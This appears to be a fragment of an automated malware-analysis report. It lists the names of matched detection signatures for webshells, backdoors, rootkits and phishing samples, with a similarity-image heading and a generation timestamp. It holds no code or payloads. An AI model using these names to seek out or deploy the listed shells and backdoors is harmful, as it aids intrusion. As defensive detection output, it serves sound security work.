hkshell_hkrmv FeliksPack3___PHP_Shells_phpft bdcli100 rdrbs084 HYTop_CaseSwitch_2005 FSO_s_casus15_2 installer elmaliseker shelltools_g0t_root_resolve shelltools_g0t_root_Fport HYTop_DevPack_upload PasswordReminder rknt_zip_Folder_RkNT dbgntboot PHP_shell rdrbs100 Mithril_Mithril hkdoordll Mithril_v1_45_dllTest dbgiis6cli Debug_cress FeliksPack3___PHP_Shells_usr FSO_s_phpinj xssshell_db 
EditServer_Webshell_2 by064cli Mithril_dllTest connector shelltools_g0t_root_HideRun regshell PHP_Shell_v1_7 xssshell_save screencap ZXshell2_0_rar_Folder_zxrecv _root_040_zip_Folder_deploy by063cli icyfox007v1_10_rar_Folder_asp byshell063_ntboot_2 shelltools_g0t_root_xwhois vanquish_2 ZXshell2_0_rar_Folder_nc BIN_Server HYTop2006_rar_Folder_2006 HDConfig Pastebin_Webshell chinese_spam_echoer CryptoWall_Resume_phish with_attachment davivienda email_Ukraine_power_attack_content content


SIMILARITY IMAGE

class:100
QBANALYZER∞ GENERATED THIS REPORT AT 2020-03-04 11:44:43 ON LINUX-5.3.0-40-GENERIC-X86_64-WITH-UBUNTU-18.04-BIONIC